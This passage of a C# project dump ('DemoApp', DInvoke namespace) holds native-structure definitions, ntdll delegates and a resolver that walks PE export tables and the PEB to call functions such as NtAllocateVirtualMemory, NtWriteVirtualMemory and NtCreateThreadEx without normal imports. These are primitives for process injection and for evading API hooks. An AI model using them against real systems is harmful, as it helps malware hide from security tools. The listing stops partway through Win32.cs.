488 | CommitmentLimit = 0xc000012d, 489 | InvalidImageLeFormat = 0xc000012e, 490 | InvalidImageNotMz = 0xc000012f, 491 | InvalidImageProtect = 0xc0000130, 492 | InvalidImageWin16 = 0xc0000131, 493 | LogonServer = 0xc0000132, 494 | DifferenceAtDc = 0xc0000133, 495 | SynchronizationRequired = 0xc0000134, 496 | DllNotFound = 0xc0000135, 497 | IoPrivilegeFailed = 0xc0000137, 498 | OrdinalNotFound = 0xc0000138, 499 | EntryPointNotFound = 0xc0000139, 500 | ControlCExit = 0xc000013a, 501 | InvalidAddress = 0xc0000141, 502 | PortNotSet = 0xc0000353, 503 | DebuggerInactive = 0xc0000354, 504 | CallbackBypass = 0xc0000503, 505 | PortClosed = 0xc0000700, 506 | MessageLost = 0xc0000701, 507 | InvalidMessage = 0xc0000702, 508 | RequestCanceled = 0xc0000703, 509 | RecursiveDispatch = 0xc0000704, 510 | LpcReceiveBufferExpected = 0xc0000705, 511 | LpcInvalidConnectionUsage = 0xc0000706, 512 | LpcRequestsNotAllowed = 0xc0000707, 513 | ResourceInUse = 0xc0000708, 514 | ProcessIsProtected = 0xc0000712, 515 | VolumeDirty = 0xc0000806, 516 | FileCheckedOut = 0xc0000901, 517 | CheckOutRequired = 0xc0000902, 518 | BadFileType = 0xc0000903, 519 | FileTooLarge = 0xc0000904, 520 | FormsAuthRequired = 0xc0000905, 521 | VirusInfected = 0xc0000906, 522 | VirusDeleted = 0xc0000907, 523 | TransactionalConflict = 0xc0190001, 524 | InvalidTransaction = 0xc0190002, 525 | TransactionNotActive = 0xc0190003, 526 | TmInitializationFailed = 0xc0190004, 527 | RmNotActive = 0xc0190005, 528 | RmMetadataCorrupt = 0xc0190006, 529 | TransactionNotJoined = 0xc0190007, 530 | DirectoryNotRm = 0xc0190008, 531 | CouldNotResizeLog = 0xc0190009, 532 | TransactionsUnsupportedRemote = 0xc019000a, 533 | LogResizeInvalidSize = 0xc019000b, 534 | RemoteFileVersionMismatch = 0xc019000c, 535 | CrmProtocolAlreadyExists = 0xc019000f, 536 | TransactionPropagationFailed = 0xc0190010, 537 | CrmProtocolNotFound = 0xc0190011, 538 | TransactionSuperiorExists = 0xc0190012, 539 | TransactionRequestNotValid = 0xc0190013, 540 | TransactionNotRequested = 0xc0190014, 541 | TransactionAlreadyAborted = 0xc0190015, 542 | TransactionAlreadyCommitted = 0xc0190016, 543 | TransactionInvalidMarshallBuffer = 0xc0190017, 544 | CurrentTransactionNotValid = 0xc0190018, 545 | LogGrowthFailed = 0xc0190019, 546 | ObjectNoLongerExists = 0xc0190021, 547 | StreamMiniversionNotFound = 0xc0190022, 548 | StreamMiniversionNotValid = 0xc0190023, 549 | MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024, 550 | CantOpenMiniversionWithModifyIntent = 0xc0190025, 551 | CantCreateMoreStreamMiniversions = 0xc0190026, 552 | HandleNoLongerValid = 0xc0190028, 553 | NoTxfMetadata = 0xc0190029, 554 | LogCorruptionDetected = 0xc0190030, 555 | CantRecoverWithHandleOpen = 0xc0190031, 556 | RmDisconnected = 0xc0190032, 557 | EnlistmentNotSuperior = 0xc0190033, 558 | RecoveryNotNeeded = 0xc0190034, 559 | RmAlreadyStarted = 0xc0190035, 560 | FileIdentityNotPersistent = 0xc0190036, 561 | CantBreakTransactionalDependency = 0xc0190037, 562 | CantCrossRmBoundary = 0xc0190038, 563 | TxfDirNotEmpty = 0xc0190039, 564 | IndoubtTransactionsExist = 0xc019003a, 565 | TmVolatile = 0xc019003b, 566 | RollbackTimerExpired = 0xc019003c, 567 | TxfAttributeCorrupt = 0xc019003d, 568 | EfsNotAllowedInTransaction = 0xc019003e, 569 | TransactionalOpenNotAllowed = 0xc019003f, 570 | TransactedMappingUnsupportedRemote = 0xc0190040, 571 | TxfMetadataAlreadyPresent = 0xc0190041, 572 | TransactionScopeCallbacksNotSet = 0xc0190042, 573 | TransactionRequiredPromotion = 0xc0190043, 574 | CannotExecuteFileInTransaction = 0xc0190044, 575 | TransactionsNotFrozen = 0xc0190045, 576 | 577 | MaximumNtStatus = 0xffffffff 578 | } 579 | } 580 | 581 | public static class PE 582 | { 583 | [StructLayout(LayoutKind.Sequential)] 584 | public struct LDR_DATA_TABLE_ENTRY 585 | { 586 | public Data.Native.LIST_ENTRY InLoadOrderLinks; 587 | public Data.Native.LIST_ENTRY InMemoryOrderLinks; 588 | public Data.Native.LIST_ENTRY InInitializationOrderLinks; 589 | public IntPtr DllBase; 590 | public IntPtr EntryPoint; 591 | public UInt32 SizeOfImage; 592 | public Data.Native.UNICODE_STRING FullDllName; 593 | public Data.Native.UNICODE_STRING BaseDllName; 594 | } 595 | 596 | [StructLayout(LayoutKind.Explicit)] 597 | public struct ApiSetNamespace 598 | { 599 | [FieldOffset(0x0C)] 600 | public int Count; 601 | 602 | [FieldOffset(0x10)] 603 | public int EntryOffset; 604 | } 605 | 606 | [StructLayout(LayoutKind.Explicit)] 607 | public struct ApiSetNamespaceEntry 608 | { 609 | [FieldOffset(0x04)] 610 | public int NameOffset; 611 | 612 | [FieldOffset(0x08)] 613 | public int NameLength; 614 | 615 | [FieldOffset(0x10)] 616 | public int ValueOffset; 617 | 618 | [FieldOffset(0x14)] 619 | public int ValueLength; 620 | } 621 | 622 | [StructLayout(LayoutKind.Explicit)] 623 | public struct ApiSetValueEntry 624 | { 625 | [FieldOffset(0x00)] 626 | public int Flags; 627 | 628 | [FieldOffset(0x04)] 629 | public int NameOffset; 630 | 631 | [FieldOffset(0x08)] 632 | public int NameCount; 633 | 634 | [FieldOffset(0x0C)] 635 | public int ValueOffset; 636 | 637 | [FieldOffset(0x10)] 638 | public int ValueCount; 639 | } 640 | } 641 | } 642 | } -------------------------------------------------------------------------------- /DemoApp/DInvoke/Delegates.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace DemoApp.DInvoke 5 | { 6 | public struct Delegates 7 | { 8 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 9 | public delegate Data.Native.NTSTATUS NtCreateThreadEx( 10 | out IntPtr threadHandle, 11 | Data.Win32.ACCESS_MASK desiredAccess, 12 | IntPtr objectAttributes, 13 | IntPtr processHandle, 14 | IntPtr startAddress, 15 | IntPtr parameter, 16 | bool createSuspended, 17 | int stackZeroBits, 18 | int sizeOfStack, 19 | int maximumStackSize, 20 | IntPtr attributeList); 21 | 22 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 23 | public delegate void RtlInitUnicodeString( 24 | ref Data.Native.UNICODE_STRING destinationString, 25 | [MarshalAs(UnmanagedType.LPWStr)] 26 | string sourceString); 27 | 28 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 29 | public delegate uint LdrLoadDll( 30 | IntPtr pathToFile, 31 | uint dwFlags, 32 | ref Data.Native.UNICODE_STRING moduleFileName, 33 | ref IntPtr moduleHandle); 34 | 35 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 36 | public delegate void RtlZeroMemory( 37 | IntPtr destination, 38 | int length); 39 | 40 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 41 | public delegate uint NtQueryInformationProcess( 42 | IntPtr processHandle, 43 | Data.Native.PROCESSINFOCLASS processInformationClass, 44 | IntPtr processInformation, 45 | int processInformationLength, 46 | ref uint returnLength); 47 | 48 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 49 | public delegate bool CreateProcessA( 50 | string lpApplicationName, 51 | string lpCommandLine, 52 | ref Data.Win32.SECURITY_ATTRIBUTES lpProcessAttributes, 53 | ref Data.Win32.SECURITY_ATTRIBUTES lpThreadAttributes, 54 | bool bInheritHandles, 55 | uint dwCreationFlags, 56 | IntPtr lpEnvironment, 57 | string lpCurrentDirectory, 58 | ref Data.Win32.STARTUPINFOEX lpStartupInfoEx, 59 | out Data.Win32.PROCESS_INFORMATION lpProcessInformation); 60 | 61 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 62 | public delegate bool InitializeProcThreadAttributeList( 63 | IntPtr lpAttributeList, 64 | int dwAttributeCount, 65 | int dwFlags, 66 | ref IntPtr lpSize); 67 | 68 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 69 | public delegate bool UpdateProcThreadAttribute( 70 | IntPtr lpAttributeList, 71 | uint dwFlags, 72 | IntPtr attribute, 73 | IntPtr lpValue, 74 | IntPtr cbSize, 75 | IntPtr lpPreviousValue, 76 | IntPtr lpReturnSize); 77 | 78 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 79 | public delegate bool DeleteProcThreadAttributeList( 80 | IntPtr lpAttributeList); 81 | 82 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 83 | public delegate uint WaitForSingleObject( 84 | IntPtr hHandle, 85 | uint dwMilliseconds); 86 | 87 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 88 | public delegate bool CloseHandle(IntPtr hProcess); 89 | 90 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 91 | public delegate bool DuplicateHandle( 92 | IntPtr hSourceProcessHandle, 93 | IntPtr hSourceHandle, 94 | IntPtr hTargetProcessHandle, 95 | ref IntPtr lpTargetHandle, 96 | uint dwDesiredAccess, 97 | bool bInheritHandle, 98 | Data.Win32.DuplicateOptions dwOptions); 99 | 100 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 101 | public delegate bool CreatePipe( 102 | ref IntPtr hReadPipe, 103 | ref IntPtr hWritePipe, 104 | ref Data.Win32.SECURITY_ATTRIBUTES lpPipeAttributes, 105 | uint nSize); 106 | 107 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 108 | public delegate bool PeekNamedPipe( 109 | IntPtr handle, 110 | IntPtr buffer, 111 | IntPtr nBufferSize, 112 | IntPtr bytesRead, 113 | ref uint bytesAvail, 114 | IntPtr bytesLeftThisMessage); 115 | 116 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 117 | public delegate bool SetHandleInformation( 118 | IntPtr hObject, 119 | Data.Win32.HandleFlags dwMask, 120 | Data.Win32.HandleFlags dwFlags); 121 | 122 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 123 | public delegate uint NtProtectVirtualMemory( 124 | IntPtr processHandle, 125 | ref IntPtr baseAddress, 126 | ref IntPtr regionSize, 127 | uint newProtect, 128 | ref uint oldProtect); 129 | 130 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 131 | public delegate uint NtAllocateVirtualMemory( 132 | IntPtr processHandle, 133 | ref IntPtr baseAddress, 134 | IntPtr zeroBits, 135 | ref IntPtr regionSize, 136 | uint allocationType, 137 | uint protect); 138 | 139 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 140 | public delegate uint NtWriteVirtualMemory( 141 | IntPtr processHandle, 142 | IntPtr baseAddress, 143 | IntPtr buffer, 144 | uint bufferLength, 145 | ref uint bytesWritten); 146 | 147 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 148 | public delegate uint NtReadVirtualMemory( 149 | IntPtr processHandle, 150 | IntPtr baseAddress, 151 | IntPtr buffer, 152 | uint numberOfBytesToRead, 153 | ref uint numberOfBytesRead); 154 | 155 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 156 | public delegate uint NtResumeThread( 157 | IntPtr hThread, 158 | IntPtr suspendCount); 159 | } 160 | } -------------------------------------------------------------------------------- /DemoApp/DInvoke/Generic.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Diagnostics; 4 | using System.IO; 5 | using System.Runtime.InteropServices; 6 | 7 | namespace DemoApp.DInvoke 8 | { 9 | public static class Generic 10 | { 11 | public static object DynamicAPIInvoke(string dllName, string functionName, Type functionDelegateType, ref object[] parameters, bool canLoadFromDisk = false, bool resolveForwards = true) 12 | { 13 | var pFunction = GetLibraryAddress(dllName, functionName, canLoadFromDisk, resolveForwards); 14 | return DynamicFunctionInvoke(pFunction, functionDelegateType, ref parameters); 15 | } 16 | 17 | private static object DynamicFunctionInvoke(IntPtr functionPointer, Type functionDelegateType, ref object[] parameters) 18 | { 19 | var funcDelegate = Marshal.GetDelegateForFunctionPointer(functionPointer, functionDelegateType); 20 | return funcDelegate.DynamicInvoke(parameters); 21 | } 22 | 23 | private static IntPtr GetLibraryAddress(string dllName, string functionName, bool canLoadFromDisk = false, bool resolveForwards = true) 24 | { 25 | var hModule = GetLoadedModuleAddress(dllName); 26 | if (hModule == IntPtr.Zero && canLoadFromDisk) 27 | { 28 | hModule = LoadModuleFromDisk(dllName); 29 | if (hModule == IntPtr.Zero) 30 | { 31 | throw new FileNotFoundException(dllName + ", unable to find the specified file."); 32 | } 33 | } 34 | else if (hModule == IntPtr.Zero) 35 | { 36 | throw new DllNotFoundException(dllName + ", Dll was not found."); 37 | } 38 | 39 | return GetExportAddress(hModule, functionName, resolveForwards); 40 | } 41 | 42 | private static IntPtr GetLoadedModuleAddress(string dllName) 43 | { 44 | var procModules = Process.GetCurrentProcess().Modules; 45 | foreach (ProcessModule mod in procModules) 46 | { 47 | if (mod.FileName.ToLower().EndsWith(dllName.ToLower())) 48 | { 49 | return mod.BaseAddress; 50 | } 51 | } 52 | return IntPtr.Zero; 53 | } 54 | 55 | private static IntPtr LoadModuleFromDisk(string dllPath) 56 | { 57 | var uModuleName = new Data.Native.UNICODE_STRING(); 58 | Native.RtlInitUnicodeString(ref uModuleName, dllPath); 59 | 60 | var hModule = IntPtr.Zero; 61 | var callResult = Native.LdrLoadDll(IntPtr.Zero, 0, ref uModuleName, ref hModule); 62 | if (callResult != Data.Native.NTSTATUS.Success || hModule == IntPtr.Zero) 63 | { 64 | return IntPtr.Zero; 65 | } 66 | 67 | return hModule; 68 | } 69 | 70 | private static IntPtr GetExportAddress(IntPtr moduleBase, string exportName, bool resolveForwards = true) 71 | { 72 | var functionPtr = IntPtr.Zero; 73 | try 74 | { 75 | // Traverse the PE header in memory 76 | var peHeader = Marshal.ReadInt32((IntPtr)(moduleBase.ToInt64() + 0x3C)); 77 | var optHeader = moduleBase.ToInt64() + peHeader + 0x18; 78 | var magic = Marshal.ReadInt16((IntPtr)optHeader); 79 | long pExport = 0; 80 | if (magic == 0x010b) 81 | { 82 | pExport = optHeader + 0x60; 83 | } 84 | else 85 | { 86 | pExport = optHeader + 0x70; 87 | } 88 | 89 | // Read -> IMAGE_EXPORT_DIRECTORY 90 | var exportRva = Marshal.ReadInt32((IntPtr)pExport); 91 | var ordinalBase = Marshal.ReadInt32((IntPtr)(moduleBase.ToInt64() + exportRva + 0x10)); 92 | var numberOfNames = Marshal.ReadInt32((IntPtr)(moduleBase.ToInt64() + exportRva + 0x18)); 93 | var functionsRva = Marshal.ReadInt32((IntPtr)(moduleBase.ToInt64() + exportRva + 0x1C)); 94 | var namesRva = Marshal.ReadInt32((IntPtr)(moduleBase.ToInt64() + exportRva + 0x20)); 95 | var ordinalsRva = Marshal.ReadInt32((IntPtr)(moduleBase.ToInt64() + exportRva + 0x24)); 96 | 97 | // Get the VAs of the name table's beginning and end. 98 | var namesBegin = moduleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(moduleBase.ToInt64() + namesRva)); 99 | 100 | // Loop the array of export name RVA's 101 | for (var i = 0; i < numberOfNames; i++) 102 | { 103 | var functionName = Marshal.PtrToStringAnsi((IntPtr)(moduleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(moduleBase.ToInt64() + namesRva + i * 4)))); 104 | 105 | if (functionName.Equals(exportName, StringComparison.OrdinalIgnoreCase)) 106 | { 107 | var functionOrdinal = Marshal.ReadInt16((IntPtr)(moduleBase.ToInt64() + ordinalsRva + i * 2)) + ordinalBase; 108 | var functionRva = Marshal.ReadInt32((IntPtr)(moduleBase.ToInt64() + functionsRva + (4 * (functionOrdinal - ordinalBase)))); 109 | functionPtr = (IntPtr)((long)moduleBase + functionRva); 110 | 111 | if (resolveForwards) 112 | // If the export address points to a forward, get the address 113 | functionPtr = GetForwardAddress(functionPtr); 114 | 115 | break; 116 | } 117 | } 118 | } 119 | catch 120 | { 121 | // Catch parser failure 122 | throw new InvalidOperationException("Failed to parse module exports."); 123 | } 124 | 125 | if (functionPtr == IntPtr.Zero) 126 | { 127 | // Export not found 128 | throw new MissingMethodException(exportName + ", export not found."); 129 | } 130 | return functionPtr; 131 | } 132 | 133 | private static IntPtr GetForwardAddress(IntPtr exportAddress, bool canLoadFromDisk = false) 134 | { 135 | var functionPtr = exportAddress; 136 | try 137 | { 138 | // Assume it is a forward. If it is not, we will get an error 139 | var forwardNames = Marshal.PtrToStringAnsi(functionPtr); 140 | var values = forwardNames.Split('.'); 141 | 142 | if (values.Length > 1) 143 | { 144 | var forwardModuleName = values[0]; 145 | var forwardExportName = values[1]; 146 | 147 | // Check if it is an API Set mapping 148 | var apiSet = GetApiSetMapping(); 149 | var lookupKey = forwardModuleName.Substring(0, forwardModuleName.Length - 2) + ".dll"; 150 | if (apiSet.ContainsKey(lookupKey)) 151 | forwardModuleName = apiSet[lookupKey]; 152 | else 153 | forwardModuleName = forwardModuleName + ".dll"; 154 | 155 | var hModule = GetPebLdrModuleEntry(forwardModuleName); 156 | if (hModule == IntPtr.Zero && canLoadFromDisk == true) 157 | hModule = LoadModuleFromDisk(forwardModuleName); 158 | if (hModule != IntPtr.Zero) 159 | { 160 | functionPtr = GetExportAddress(hModule, forwardExportName); 161 | } 162 | } 163 | } 164 | catch 165 | { 166 | // Do nothing, it was not a forward 167 | } 168 | return functionPtr; 169 | } 170 | 171 | private static IntPtr GetPebLdrModuleEntry(string dllName) 172 | { 173 | // Get _PEB pointer 174 | var pbi = Native.NtQueryInformationProcessBasicInformation((IntPtr)(-1)); 175 | 176 | // Set function variables 177 | uint ldrDataOffset = 0; 178 | uint inLoadOrderModuleListOffset = 0; 179 | if (IntPtr.Size == 4) 180 | { 181 | ldrDataOffset = 0xc; 182 | inLoadOrderModuleListOffset = 0xC; 183 | } 184 | else 185 | { 186 | ldrDataOffset = 0x18; 187 | inLoadOrderModuleListOffset = 0x10; 188 | } 189 | 190 | // Get module InLoadOrderModuleList -> _LIST_ENTRY 191 | var pebLdrData = Marshal.ReadIntPtr((IntPtr)((ulong)pbi.PebBaseAddress + ldrDataOffset)); 192 | var pInLoadOrderModuleList = (IntPtr)((ulong)pebLdrData + inLoadOrderModuleListOffset); 193 | var le = (Data.Native.LIST_ENTRY)Marshal.PtrToStructure(pInLoadOrderModuleList, typeof(Data.Native.LIST_ENTRY)); 194 | 195 | // Loop entries 196 | var flink = le.Flink; 197 | var hModule = IntPtr.Zero; 198 | var dte = (Data.PE.LDR_DATA_TABLE_ENTRY)Marshal.PtrToStructure(flink, typeof(Data.PE.LDR_DATA_TABLE_ENTRY)); 199 | while (dte.InLoadOrderLinks.Flink != le.Blink) 200 | { 201 | // Match module name 202 | if (Marshal.PtrToStringUni(dte.FullDllName.Buffer).EndsWith(dllName, StringComparison.OrdinalIgnoreCase)) 203 | { 204 | hModule = dte.DllBase; 205 | } 206 | 207 | // Move Ptr 208 | flink = dte.InLoadOrderLinks.Flink; 209 | dte = (Data.PE.LDR_DATA_TABLE_ENTRY)Marshal.PtrToStructure(flink, typeof(Data.PE.LDR_DATA_TABLE_ENTRY)); 210 | } 211 | 212 | return hModule; 213 | } 214 | 215 | private static Dictionary GetApiSetMapping() 216 | { 217 | var pbi = Native.NtQueryInformationProcessBasicInformation((IntPtr)(-1)); 218 | var apiSetMapOffset = IntPtr.Size == 4 ? (uint)0x38 : 0x68; 219 | 220 | // Create mapping dictionary 221 | var apiSetDict = new Dictionary(); 222 | 223 | var pApiSetNamespace = Marshal.ReadIntPtr((IntPtr)((ulong)pbi.PebBaseAddress + apiSetMapOffset)); 224 | var apiSetNamespace = (Data.PE.ApiSetNamespace)Marshal.PtrToStructure(pApiSetNamespace, typeof(Data.PE.ApiSetNamespace)); 225 | for (var i = 0; i < apiSetNamespace.Count; i++) 226 | { 227 | var setEntry = new Data.PE.ApiSetNamespaceEntry(); 228 | 229 | var pSetEntry = (IntPtr)((ulong)pApiSetNamespace + (ulong)apiSetNamespace.EntryOffset + (ulong)(i * Marshal.SizeOf(setEntry))); 230 | setEntry = (Data.PE.ApiSetNamespaceEntry)Marshal.PtrToStructure(pSetEntry, typeof(Data.PE.ApiSetNamespaceEntry)); 231 | 232 | var apiSetEntryName = Marshal.PtrToStringUni((IntPtr)((ulong)pApiSetNamespace + (ulong)setEntry.NameOffset), setEntry.NameLength / 2); 233 | var apiSetEntryKey = apiSetEntryName.Substring(0, apiSetEntryName.Length - 2) + ".dll" ; // Remove the patch number and add .dll 234 | 235 | var setValue = new Data.PE.ApiSetValueEntry(); 236 | 237 | var pSetValue = IntPtr.Zero; 238 | 239 | // If there is only one host, then use it 240 | if (setEntry.ValueLength == 1) 241 | pSetValue = (IntPtr)((ulong)pApiSetNamespace + (ulong)setEntry.ValueOffset); 242 | else if (setEntry.ValueLength > 1) 243 | { 244 | // Loop through the hosts until we find one that is different from the key, if available 245 | for (var j = 0; j < setEntry.ValueLength; j++) 246 | { 247 | var host = (IntPtr)((ulong)pApiSetNamespace + (ulong)setEntry.ValueOffset + (ulong)Marshal.SizeOf(setValue) * (ulong)j); 248 | if (Marshal.PtrToStringUni(host) != apiSetEntryName) 249 | pSetValue = (IntPtr)((ulong)pApiSetNamespace + (ulong)setEntry.ValueOffset + (ulong)Marshal.SizeOf(setValue) * (ulong)j); 250 | } 251 | // If there is not one different from the key, then just use the key and hope that works 252 | if (pSetValue == IntPtr.Zero) 253 | pSetValue = (IntPtr)((ulong)pApiSetNamespace + (ulong)setEntry.ValueOffset); 254 | } 255 | 256 | //Get the host DLL's name from the entry 257 | setValue = (Data.PE.ApiSetValueEntry)Marshal.PtrToStructure(pSetValue, typeof(Data.PE.ApiSetValueEntry)); 258 | var apiSetValue = string.Empty; 259 | if (setValue.ValueCount != 0) 260 | { 261 | var pValue = (IntPtr)((ulong)pApiSetNamespace + (ulong)setValue.ValueOffset); 262 | apiSetValue = Marshal.PtrToStringUni(pValue, setValue.ValueCount / 2); 263 | } 264 | 265 | // Add pair to dict 266 | apiSetDict.Add(apiSetEntryKey, apiSetValue); 267 | } 268 | 269 | // Return dict 270 | return apiSetDict; 271 | } 272 | } 273 | } -------------------------------------------------------------------------------- /DemoApp/DInvoke/Native.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace DemoApp.DInvoke 5 | { 6 | public static class Native 7 | { 8 | public static void RtlInitUnicodeString(ref Data.Native.UNICODE_STRING destinationString, 9 | [MarshalAs(UnmanagedType.LPWStr)] string sourceString) 10 | { 11 | object[] parameters = { destinationString, sourceString }; 12 | 13 | Generic.DynamicAPIInvoke("ntdll.dll", "RtlInitUnicodeString", typeof(Delegates.RtlInitUnicodeString), 14 | ref parameters); 15 | 16 | destinationString = (Data.Native.UNICODE_STRING)parameters[0]; 17 | } 18 | 19 | public static Data.Native.NTSTATUS LdrLoadDll(IntPtr pathToFile, uint dwFlags, 20 | ref Data.Native.UNICODE_STRING moduleFileName, ref IntPtr moduleHandle) 21 | { 22 | object[] parameters = { pathToFile, dwFlags, moduleFileName, moduleHandle }; 23 | 24 | var result = (Data.Native.NTSTATUS)Generic.DynamicAPIInvoke("ntdll.dll", "LdrLoadDll", 25 | typeof(Delegates.LdrLoadDll), ref parameters); 26 | 27 | moduleHandle = (IntPtr)parameters[3]; 28 | return result; 29 | } 30 | 31 | public static Data.Native.PROCESS_BASIC_INFORMATION NtQueryInformationProcessBasicInformation(IntPtr hProcess) 32 | { 33 | var result = NtQueryInformationProcess(hProcess, Data.Native.PROCESSINFOCLASS.ProcessBasicInformation, 34 | out var pProcInfo); 35 | 36 | if (result != Data.Native.NTSTATUS.Success) 37 | throw new UnauthorizedAccessException("Access is denied."); 38 | 39 | return (Data.Native.PROCESS_BASIC_INFORMATION)Marshal.PtrToStructure(pProcInfo, 40 | typeof(Data.Native.PROCESS_BASIC_INFORMATION)); 41 | } 42 | 43 | private static Data.Native.NTSTATUS NtQueryInformationProcess(IntPtr hProcess, 44 | Data.Native.PROCESSINFOCLASS processInfoClass, out IntPtr pProcInfo) 45 | { 46 | int processInformationLength; 47 | uint retLen = 0; 48 | 49 | switch (processInfoClass) 50 | { 51 | case Data.Native.PROCESSINFOCLASS.ProcessWow64Information: 52 | pProcInfo = Marshal.AllocHGlobal(IntPtr.Size); 53 | RtlZeroMemory(pProcInfo, IntPtr.Size); 54 | processInformationLength = IntPtr.Size; 55 | break; 56 | 57 | case Data.Native.PROCESSINFOCLASS.ProcessBasicInformation: 58 | var pbi = new Data.Native.PROCESS_BASIC_INFORMATION(); 59 | pProcInfo = Marshal.AllocHGlobal(Marshal.SizeOf(pbi)); 60 | RtlZeroMemory(pProcInfo, Marshal.SizeOf(pbi)); 61 | Marshal.StructureToPtr(pbi, pProcInfo, true); 62 | processInformationLength = Marshal.SizeOf(pbi); 63 | break; 64 | 65 | default: 66 | throw new InvalidOperationException($"Invalid ProcessInfoClass: {processInfoClass}"); 67 | } 68 | 69 | object[] parameters = { hProcess, processInfoClass, pProcInfo, processInformationLength, retLen }; 70 | 71 | var retValue = (Data.Native.NTSTATUS)Generic.DynamicAPIInvoke("ntdll.dll", "NtQueryInformationProcess", 72 | typeof(Delegates.NtQueryInformationProcess), ref parameters); 73 | 74 | if (retValue != Data.Native.NTSTATUS.Success) 75 | throw new UnauthorizedAccessException("Access is denied."); 76 | 77 | pProcInfo = (IntPtr)parameters[2]; 78 | return retValue; 79 | } 80 | 81 | public static void RtlZeroMemory(IntPtr destination, int length) 82 | { 83 | object[] parameters = { destination, length }; 84 | Generic.DynamicAPIInvoke("ntdll.dll", "RtlZeroMemory", typeof(Delegates.RtlZeroMemory), ref parameters); 85 | } 86 | 87 | public static uint NtProtectVirtualMemory(IntPtr processHandle, ref IntPtr baseAddress, ref IntPtr regionSize, 88 | uint newProtect) 89 | { 90 | uint oldProtect = 0; 91 | object[] parameters = { processHandle, baseAddress, regionSize, newProtect, oldProtect }; 92 | 93 | _ = (uint)Generic.DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", 94 | typeof(Delegates.NtProtectVirtualMemory), ref parameters); 95 | 96 | oldProtect = (uint)parameters[4]; 97 | return oldProtect; 98 | } 99 | 100 | public static uint NtWriteVirtualMemory(IntPtr processHandle, IntPtr baseAddress, IntPtr buffer, 101 | uint bufferLength) 102 | { 103 | uint bytesWritten = 0; 104 | object[] parameters = { processHandle, baseAddress, buffer, bufferLength, bytesWritten }; 105 | 106 | _ = (uint)Generic.DynamicAPIInvoke("ntdll.dll", "NtWriteVirtualMemory", 107 | typeof(Delegates.NtWriteVirtualMemory), ref parameters); 108 | 109 | bytesWritten = (uint)parameters[4]; 110 | return bytesWritten; 111 | } 112 | 113 | public static uint NtReadVirtualMemory(IntPtr processHandle, IntPtr baseAddress, IntPtr buffer, 114 | ref uint numberOfBytesToRead) 115 | { 116 | uint numberOfBytesRead = 0; 117 | object[] parameters = { processHandle, baseAddress, buffer, numberOfBytesToRead, numberOfBytesRead }; 118 | 119 | _ = (uint)Generic.DynamicAPIInvoke("ntdll.dll", "NtReadVirtualMemory", 120 | typeof(Delegates.NtReadVirtualMemory), ref parameters); 121 | 122 | numberOfBytesRead = (uint)parameters[4]; 123 | return numberOfBytesRead; 124 | } 125 | 126 | public static IntPtr NtAllocateVirtualMemory(IntPtr processHandle, ref IntPtr baseAddress, IntPtr zeroBits, 127 | ref IntPtr regionSize, uint allocationType, uint protect) 128 | { 129 | object[] parameters = { processHandle, baseAddress, zeroBits, regionSize, allocationType, protect }; 130 | 131 | _ = (Data.Native.NTSTATUS)Generic.DynamicAPIInvoke("ntdll.dll", "NtAllocateVirtualMemory", 132 | typeof(Delegates.NtAllocateVirtualMemory), ref parameters); 133 | 134 | baseAddress = (IntPtr)parameters[1]; 135 | return baseAddress; 136 | } 137 | 138 | public static uint NtResumeThread(IntPtr hThread, IntPtr suspendCount) 139 | { 140 | object[] parameters = { hThread, suspendCount }; 141 | 142 | return (uint)Generic.DynamicAPIInvoke("ntdll.dll", "NtResumeThread", typeof(Delegates.NtResumeThread), 143 | ref parameters); 144 | } 145 | 146 | public static Data.Native.NTSTATUS NtCreateThreadEx(ref IntPtr threadHandle, 147 | Data.Win32.ACCESS_MASK desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr startAddress, 148 | IntPtr parameter, bool createSuspended, int stackZeroBits, int sizeOfStack, int maximumStackSize, 149 | IntPtr attributeList) 150 | { 151 | object[] parameters = 152 | { 153 | threadHandle, desiredAccess, objectAttributes, processHandle, startAddress, parameter, createSuspended, 154 | stackZeroBits, 155 | sizeOfStack, maximumStackSize, attributeList 156 | }; 157 | 158 | var result = (Data.Native.NTSTATUS)Generic.DynamicAPIInvoke("ntdll.dll", "NtCreateThreadEx", 159 | typeof(Delegates.NtCreateThreadEx), ref parameters); 160 | 161 | threadHandle = (IntPtr)parameters[0]; 162 | return result; 163 | } 164 | } 165 | } -------------------------------------------------------------------------------- /DemoApp/DInvoke/Win32.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using System.Runtime.InteropServices; 4 | 5 | namespace DemoApp.DInvoke 6 | { 7 | public static class Win32 8 | { 9 | public static bool CreateProcess(string applicationName, string lpCommandLine, uint creationFlags, 10 | Data.Win32.STARTUPINFOEX startupInfoEx, out Data.Win32.PROCESS_INFORMATION processInformation) 11 | { 12 | var pa = new Data.Win32.SECURITY_ATTRIBUTES(); 13 | var ta = new Data.Win32.SECURITY_ATTRIBUTES(); 14 | pa.nLength = (uint)Marshal.SizeOf(pa); 15 | ta.nLength = (uint)Marshal.SizeOf(ta); 16 | 17 | var pi = new 